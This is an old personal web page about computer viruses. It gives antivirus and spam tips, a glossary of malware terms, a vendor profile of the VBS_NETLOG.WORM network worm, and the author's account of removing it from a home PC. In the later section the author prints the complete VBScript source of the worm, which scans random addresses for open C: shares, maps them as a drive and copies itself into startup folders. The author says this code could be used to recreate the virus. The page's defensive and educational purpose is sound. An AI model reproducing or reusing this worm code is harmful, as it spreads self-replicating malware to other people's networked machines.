VIRUS.htm
1A15
Scroll down to view information about the following:
To have your computer scanned for viruses, just visit www.antivirus.com/ (its free).
E-MAIL viruses
If you receive an e-mail with an attached file from an unknown source, simply delete it. Viruses and Trojan programs must have code that is executed in order to infect. If you "double-click" an attached file on an e-mail message, you are executing code and may infect your machine. (Note: Newer antivirus software is capable of scanning these attachments before they are opened.)
SPAM
More about Spam is at http://www.antivirus.com/cybercontent/spamFAQ.htm
Do not try to unsubscribe: many spammers use
the reply options to confirm the validity of the e-mail address.
Set your filters in Outlook or your e-mail application to file or
delete spam-like mail. Try blocking e-mail with words in the
header or the body such as "Free" or "Money"
or "Sex." Information on Filtering can be found at Spam
Abuse Net.
Register with Network Abuse Clearinghouse http://abuse.net/ and
report all spam through their remailer service.
Forward spam to Trend's spam collectors at spam@trendmicro.com so
that they can update filters that block new spam messages.
Glossary of Virus Terms (scroll down for definitions)
ActiveX malicious code
Aliases
Boot sector viruses
Date of origin
Description
Destructive viruses
ELF
Encrypted viruses
File infecting viruses
In-the-Wild virus list
Java malicious code
Joke programs
Language
Malware
Macro virus
NE
Password
Payload
PE
Place of origin
Platform
Risk rating
Size
Script viruses
Solution
Tech details
Trigger condition/date
Trojan
Virus types
Worm
ActiveX malicious code
ActiveX controls allow Web developers to create interactive,
dynamic Web pages with broader functionality such as HouseCall,
Trend Micro's free on-line scanner. An ActiveX control is a
component object embedded in a Web page which runs automatically
when the page is viewed. In many cases, the Web browser can be
configured so that these ActiveX controls do not execute by
changing the browser's security settings to "high."
However, hackers, virus writers, and others who wish to cause
mischief or worse may use ActiveX malicious code as a vehicle to
attack the system. To remove malicious ActiveX controls, you just
need to delete them.
Aliases
There is no commonly accepted industry standard for naming
viruses and malicious mobile code. Each may be known by several
different names or aliases. See virus types for an explanation of
Trend Micro virus-naming conventions.
Boot sector viruses
Boot sector viruses infect the boot sector or partition table of
a disk. Computer systems are most likely to be attacked by boot
sector viruses when you boot the system with an infected disk
from the floppy drive - the boot attempt does not have to be
successful for the virus to infect the hard drive. Also, there
are a few viruses that can infect the boot sector from executable
programs- these are known as the multi -partite viruses and they
are relatively rare. Once the system is infected, boot sector
virus will attempt to infect every disk that is accessed by that
computer. In general, boot sector viruses can be successfully
removed.
Date of origin
Indicates when a virus was first discovered (if known).
Description
This is a brief summary of a virus listed in the Trend Virus
Encyclopedia. For detailed technical information, click on the
"Tech Details" tab.
Destructive viruses
In addition to self-replication, computer viruses may have a
routine that can deliver the virus payload. A virus is defined as
destructive if its payload does some damage to your system, such
as corrupting or deleting files, formatting your hard drive, and
committing denial-of-service attacks etc.
ELF
ELF refers to Executable and Link Format, which is the well-documented
and available file format for Linux/UNIX executables. Trend
products detect malicious code for Linux/UNIX as "ELF_Virusname."
Encrypted viruses
Indicates that the virus code contains a special routine that
encrypts the virus body to evade detection by antivirus software.
Trend Micros antivirus products have the ability to decrypt
the virus body and detect such viruses.
File infecting viruses
File infecting viruses infect executable programs (generally,
files that have extensions of .com or .exe). Most such viruses
simply try to replicate and spread by infecting other host
programs - but some inadvertently destroy the program they infect
by overwriting some of the original code. There is a minority of
these viruses that are very destructive and attempt to format the
hard drive at a pre-determined time or perform some other
malicious action. In many cases, a file-infecting virus can be
successfully removed from the infected file's program. If the
virus has overwritten part of the code, the original file will be
unrecoverable.
In-the-Wild virus list
The In-the-Wild virus list is a list of the most common viruses
that have been found infecting users computers worldwide.
The list is compiled by the renowned antivirus researcher Joe
Wells. Wells updates the list regularly, working closely with
antivirus research teams around the world, including Trend Micros.
When ICSA (International Computer Security Association) conducts
virus testing of antivirus products, the In-the-Wild virus list
serves as the basis for its comparative analysis. More info: http://www.wildlist.org
Java malicious code
Java applets allow Web developers to create interactive, dynamic
Web pages with broader functionality. Java applets are small,
portable Java programs embedded in HTML pages. They can run
automatically when the pages are viewed. However, hackers, virus
writers, and others who wish to cause mischief may use Java
malicious code as a vehicle to attack the system. In many cases,
the Web browser can be configured so that these applets do not
execute by changing the browser's security settings to "high."
Joke programs
Joke programs are ordinary executable programs. They are added to
the detection list because they are found to be very annoying and/or
they contain pornographic images. Joke programs cannot spread
unless someone deliberately distributes them. To get rid of a
Joke program, delete the file from your system.
Language
This refers to the language locale of the virus working platform
such as MS Word in English or Chinese.
Malware
Malware is a general term used to refer to any unexpected or
malicious programs or mobile codes such as viruses, Trojan, worm,
or Joke programs.
Macro virus
Macro viruses are viruses that use another application's macro
programming language to distribute themselves. They infect
documents such as MS Word or MS Excel. Unlike other viruses,
macro viruses do not infect programs or boot sectors - although a
few do drop programs on the user's hard drive. The dropped files
may infect executable programs or boot sectors. Macro viruses can
be removed safely from the infected document using Trend Micros
antivirus products.
Special note: Occasionally, you may get an "illegal
operation" error when you try to start MS Word after
cleaning a Word macro virus. If this happens, search for the file
"normal.dot" and rename it to "normaldot.bak."
MS Word will generate a new, clean "normal.dot" the
next time it is started. This problem occurs because some viruses
can leave harmless code residue that MS Word may be reading
incorrectly, causing erratic behavior. Trend antivirus software
only removes malicious viral code and not user-created macros.
NE
NE refers to New Executable, which is the standard Windows 16-bit
executable file format. Windows 16-bit viruses are detected by
Trend products as "NE_Virusname."
Password
Some viruses set a password when they infect a document. The main
objective of the virus here is to make the document inaccessible.
This password can be a word, phrase, or even a randomly generated
number.
Payload
A virus payload is an action it performs on the infected
computer. This can be something relatively harmless like showing
messages or ejecting the CD drive, or something destructive like
deleting the entire hard drive.
PE
PE refers to Portable Executable, which is the standard Win32
executable file format. Windows 32-bit viruses are detected by
Trend products as "PE_Virusname."
Place of origin
Indicates where a virus is believed to have originated (if known).
Platform
Indicates the computer operating system or application on which a
virus can run and perform an infection. Generally, a particular
operating system is required for executable viruses and a
specific application is needed for macro viruses.
Risk rating
The risk rating of a virus is an assessment of the threat posed
by a virus. It is based on a number of different factors
including, but not limited to, potential to spread,
destructiveness of the payload, and actual number of cases
reported etc.
Size of macro/malicious code/virus
Indicates the size of the virus code in bytes. This number is
sometimes used as part of the virus name to distinguish it from
its variants.
Script viruses (VBScript, JavaScript, HTML)
Script viruses are written in script programming languages, such
as VBScript and JavaScript. VBScript (Visual Basic Script) and
JavaScript viruses make use of Microsoft's Windows Scripting Host
to activate themselves and infect other files. Since Windows
Scripting Host is available on Windows 98 and Windows 2000, the
viruses can be activated simply by double-clicking the *.vbs or *.js
file from Windows Explorer.
HTML viruses use the scripts embedded in HTML files to do their
damage. These embedded scripts automatically execute the moment
the HTML page is viewed from a script-enabled browser.
Solution
Most viruses can be cleaned or removed from the infected host
files by Trends antivirus software. Special removal
instructions are provided for viruses or Trojans that modify the
system registry and/or drop files. Generally, to remove Trojans
or Joke programs, you just need to delete the program files - no
cleaning action is needed.
For a quick check-up of your PC, use HouseCall - Trend Micro's
FREE on-line virus scanner. This will check for viruses which may
already be on your PC.
To keep your computer healthy by catching viruses before they
have a chance to infect your PC or network, get the best
antivirus solution available today. Trend Micro offers antivirus
and content security solutions for home users, corporate users,
and ISPs.
Technical details
The "technical details" section of a Virus Encyclopedia
profile contains specific information about the actions performed
by a virus on the host system. This information is provided to
assist system administrators in identifying and removing viruses.
Home users should use an automated tool like Trend PC-cillin or
Trends FREE online scanner HouseCall to
detect and remove viruses from their computer.
Trigger condition or date
This is to indicate the condition or date on which the virus
payload will be triggered. Please note that date-activated
viruses may infect your computer 365 days a year. Your computer
may be infected by these viruses prior to the date specified.
Trojan
A Trojan horse is a program that performs some unexpected or
unauthorized, usually malicious, actions such as displaying
messages, erasing files or formatting a disk. A Trojan horse
doesnt infect other host files, thus cleaning is not
necessary. To get rid of a Trojan, simply delete the program.
Virus types
Viruses and other malware are classified into various types
depending on their file formats and infection routines. To
distinguish among these types, Trend Micro uses the following
prefixes:
ActiveX malicious code - ATVX
Boot sector viruses - no prefix
COM and EXE file infectors - PE, NE, or no prefix
Executable and Link format - ELF
Joke programs - JOKE
Java malicious code - JAVA
Macro viruses - W2KM, W97M, X97M, P97M, A97M, WM, XM, V5M
Trojan horses - TROJ
VBScript, JavaScript or HTML viruses - VBS, JS, HTML
Worm
A computer worm is a self-contained program (or set of programs)
that is able to spread functional copies of itself or its
segments to other computer systems. The propagation usually takes
place via network connections or email attachments. To get rid of
a worm you just need to delete the program.
A HARMLESS TEST VIRUS
The EICAR Standard Antivirus Test File can be downloaded from http://www.antivirus.com/vinfo/testfiles/
The EICAR organization or European Institute of Computer Anti-virus Research, along with antivirus vendors, has developed this test file to assist users in testing their installations of antivirus software. It is recommended that vendors detect this file.
This is NOT A VIRUS. The file is a test file which may be used to test antivirus software. The code is harmless and when detected properly the virus scanner will display the following message: EICAR-TEST-FILE
HOW I REMOVED A VIRUS FROM MY COMPUTER
A free scan of my computer by www.antivirus.com found on the C:/ drive of my computer a "Non Cleanable" virus in the following three directories:
I found an identical virus file in all three of the above directories and deleted them after I edited one with NotePad to view it English language codes.
The following information about the network.vbs virus came from www.netvirus.com
VBS_NETLOG.WORM
Risk rating:
Virus type: VBScript
Destructive: N
Aliases:
NETLOG.WORM , NETWORK.VBS
Description:
This Trojan when run searches for a computer in the network where
c:\ is shared with full control and accesses files. This virus
does not run on Windows NT environment.
Solution:
Please delete the file "network.vbs" located in
directories where it was added. You may also disconnect mapping
of the network drive to ensure complete safety.
If you need further assistance with this solution, please send an
email to virus_doctor@trendmicro.com.
Trend Micro offers best-of-breed antivirus and content-security
solutions for your corporate network or home PC.
VBS_NETLOG.WORM (continued from profile page)
In the wild: Yes
Trigger date 1: Any Day
Payload 1: Others (drops files in directories)
Payload 2: Others (accesses files with full shared control in
network)
Detected by pattern file#: 659
Detected by scan engine#: 2.082
Language: English
Platform: Windows
Encrypted: No
Size of virus: 2,429 Bytes
Details:
Upon execution, this Trojan checks for the file network.log
in the c:\ drive, then it writes the text Log file Open
to this file. It then writes in this log file random addresses
with the text:
Subnet : ...0
where:
Random number 1 is the number between 199 to 214
Random number 2 and Random number 3 is the number between1 to 254
Then the malware picks a random address for it to scan. After
this, the virus checks for a computer in a network wherein the
shared format of c:\ is full control. It then maps the c:\ of the
infected computer as j:\.
The Trojan also adds the following line to the log file network.log
for every drive it has mapped:
Copying files to :
and checks the first network.vbs file it copies and then writes
to the log:
Successful copy to : if copy is successful.
After mapping c:\ to j:\, it copies the file network.vbs to the
following locations:
J:\windows\startm~1\programs\startup\
J:\windows\
J:\windows\start menu\programs\startup\
J:\win95\start menu\programs\startup\
J:\win95\ startm~1\programs\startup\
J:\win95\
When the infected computer reboots, the virus runs because it is
at the startup directory. With this the hacker can access all the
files in c:\.
The form of lookup by this worm can also act as a Distributed
Denial of Service (DDOS) attack since the queries the virus
performs can overwhelm a server until all requests cannot be
serviced anymore, thereby crashing the system.
HouseCall informed me it could not access the files listed below. Please note that there is the potential of virus infection in files HouseCall cannot scan
(I just left some of these file alone because I was not sure what would happen to my computer if I deleted them.).
File Name | Type | Message |
C:\WINDOWS\HELP\windows.GID | File | Fail to scan file (-89,Skip this file) |
C:\WINDOWS\Temporary Internet Files\Content.IE5\6DQZA5CF\wtc[1].jar *META-INF\MANIFEST.MF* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\WINDOWS\Temporary Internet Files\Content.IE5\6DQZA5CF\wtc[1].jar ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\WINDOWS\WIN386.SWP | File | Fail to scan file (-94,Open file for data reading error) |
C:\Program Files\Juno\lib\juno.GID | File | Fail to scan file (-89,Skip this file) |
C:\Program Files\Juno\lib\CONTACT.GID | File | Fail to scan file (-89,Skip this file) |
C:\Program Files\NetZero\lib\bwt300.jar *META-INF\MANIFEST.MF* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\bwt300.jar ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\Zcast1_6.zip *META-INF\* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\servlet.jar *META-INF\MANIFEST.MF* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\servlet.jar ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\JavaSoft\JRE\1.2\lib\plugprov.jar *META-INF\* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\1\ANCESTRY\LYLES\MAILTEXT\allofus.zip ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\1\3\NEW\Juno\lib\juno.GID | File | Fail to scan file (-89,Skip this file) |
C:\America Online 5.0\aol.GID | File | Fail to scan file (-89,Skip this file) |
C:\WINDOWSWinHlp32.BMK | File | Fail to scan file (-89,Skip this file) |
C:\WINDOWS\HELP\windows.GID | File | Fail to scan file (-89,Skip this file) |
C:\WINDOWS\WIN386.SWP | File | Fail to scan file (-94,Open file for data reading error) |
C:\Program Files\Juno\lib\juno.GID | File | Fail to scan file (-89,Skip this file) |
C:\Program Files\Juno\lib\CONTACT.GID | File | Fail to scan file (-89,Skip this file) |
C:\Program Files\NetZero\lib\bwt300.jar *META-INF\MANIFEST.MF* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\bwt300.jar ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\Zcast1_6.zip *META-INF\* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\servlet.jar *META-INF\MANIFEST.MF* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\NetZero\lib\servlet.jar ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\Program Files\JavaSoft\JRE\1.2\lib\plugprov.jar *META-INF\* | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\1\ANCESTRY\LYLES\MAILTEXT\allofus.zip ** | File | Fail to scan file (-82,The Compressed file is corrupted) |
C:\1\3\NEW\Juno\lib\juno.GID | File | Fail to scan file (-89,Skip this file) |
C:\America Online 5.0\aol.GID | File | Fail to scan file (-89,Skip this file) |
C:\WINDOWSWinHlp32.BMK | File | Fail to scan file (-89,Skip this file) |
HOW I VIEWED THE INTERNAL STRUCTURE
OF THE VIRUS HOUSECALL FOUND ON MY COMPUTER
After I transferred one copy of the three identical 237KB VBScript files named "network.vbs" to a folder I named VIRUS in my Documents folder, I right clicked on the file name "network.vbs" with my mouse to view its Properties. I changed the Property of the file from Read Only so I could edited it with Notepad (Properties also revealed that the "network.vbs" virus file was created on September 28, 1999 and modified Sunday January 9, 2000). After I examined the contents of the file, I deleted them and then deleted the file, which contained the following instructions (which might be used to recreate the virus).
dim octa
dim octb
dim octc
dim octd
dim rand
dim dot
dim driveconnected
dim sharename
dim count
dim myfile
count = "0"
dot = "."
driveconnected="0"
set wshnetwork = wscript.createobject("wscript.network")
Set fso1 = createobject("scripting.filesystemobject")
set fso2 = createobject("scripting.filesystemobject")
on error resume next
randomize
checkfile()
randaddress()
do
do while driveconnected = "0"
checkaddress()
shareformat()
wshnetwork.mapnetworkdrive "j:", sharename
enumdrives()
loop
copyfiles()
disconnectdrive()
loop
msgbox "Done"
function disconnectdrive()
wshnetwork.removenetworkdrive "j:"
driveconnected = "0"
end function
function createlogfile()
Set myfile = fso1.createtextfile("c:\network.log", True)
end function
function checkfile()
If (fso1.fileexists("c:\network.log")) then
fso1.deletefile("c:\network.log")
createlogfile()
else
createlogfile()
end If
myfile.writeLine("Log file Open")
end function
function copyfiles()
myfile.writeline("Copying files to : " & sharename)
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile "c:\network.vbs", "j:\"
If (fso2.FileExists("j:\network.vbs")) Then
myfile.writeline("Successfull copy to : " &
sharename)
End If
fso.copyfile "c:\network.vbs", "j:\windows\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\windows\"
fso.copyfile "c:\network.vbs", "j:\windows\start
menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\start
menu\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\win95\startm~1\programs\startup\"
fso.copyfile "c:\network.vbs", "j:\wind95\"
end function
function checkaddress()
octd = octd + 1
if octd = "255" then randaddress()
end function
function shareformat()
sharename = "\\" & octa & dot & octb &
dot & octc & dot & octd & "\C"
end function
function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
driveconnected = 1
else
' driveconnected = 0
end if
Next
end function
function randum()
rand = int((254 * rnd) + 1)
end function
function randaddress()
if count <50 then
octa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
octa= rand
end if
randum()
octb=rand
randum()
octc=rand
octd="1"
myfile.writeLine("Subnet : " & octa & dot &
octb & dot & octc & dot & "0")
end function
WHAT THE VIRUS DID TO MY COMPUTER
My C:\network.log file contained the information below, some or all of which was written there by the virus program, according to the description above. I opened the file in Notepad and changed its attribute from "Archive" to see if I could delete any of the following information (not that I need to), but failed (maybe the MS-DOS editor could change it).
Log file Open
Subnet : 204.235.96.0
Subnet : 214.236.191.0
Subnet : 207.181.47.0
Subnet : 214.78.187.0
Subnet : 209.88.46.0
Subnet : 201.141.92.0
Subnet : 199.69.133.0
Subnet : 208.244.120.0
Subnet : 199.225.212.0
Subnet : 200.150.39.0
Subnet : 209.221.172.0
Subnet : 200.156.56.0
Subnet : 206.150.224.0
Subnet : 202.73.206.0
Subnet : 202.128.212.0
Subnet : 201.95.149.0
Subnet : 201.203.3.0
Subnet : 204.43.49.0
Subnet : 210.193.108.0
Subnet : 200.102.8.0
Subnet : 214.140.198.0
Subnet : 210.166.127.0